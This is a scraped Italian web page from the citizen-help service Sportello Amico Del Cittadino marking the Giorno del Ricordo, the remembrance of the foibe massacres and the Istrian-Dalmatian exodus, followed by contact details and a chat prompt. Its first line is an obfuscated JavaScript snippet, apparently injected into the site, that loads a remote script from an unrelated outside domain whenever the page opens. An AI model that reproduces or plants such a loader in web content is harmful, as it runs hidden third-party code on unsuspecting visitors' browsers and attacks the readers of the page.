;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Oggi il Giorno del Ricordo in memoria delle foibe e dell'esodo istriano-dalmata - Sportello Amico Del Cittadino
Affinché simili tragedie non si ripetano
Affinché simili tragedie non si ripetano

Oggi il Giorno del Ricordo in memoria delle foibe e dell’esodo istriano-dalmata

😞 Una ricorrenza molto toccante su cui si dovrebbe riflettere affinché certe atrocità non si ripetano mai più.

🔎 Il 10 Febbraio 1947 veniva siglato il Trattato di Pace di Parigi, che stabiliva tra i suoi punti il passaggio dell’Istria, del Quarnaro, di Zara con la sua provincia e la maggior parte della Venezia Giulia, dall’Italia alla Jugoslavia. Un percorso caratterizzato da immani tragedia e sofferenze che hanno flagellato la popolazione italiana residente in quei territori, vittima di barbarie in primis con gli eccidi delle foibe e poi con l’esodo giuliano dalmata.

Sportello Amico del Cittadino auspica che la conoscenza sia vettore di pace affinché simili tragedie non accadano nuovamente.

🖥 info@sportello-amico.it
📞 +39 0331 262045

Cerca anche

CORSI DI LAUREA

Essere audaci, ambiziosi, combattivi nel lavoro migliorando le proprie prospettive occupazionali è possibile.I Corsi di …

Dona il tuo 5x1000 ad Salesiani per il sociale
Scrivimi
Come posso aiutarti?
Buongiorno! 👋
i nostri uffici sono a vostra disposizione, chatta con noi !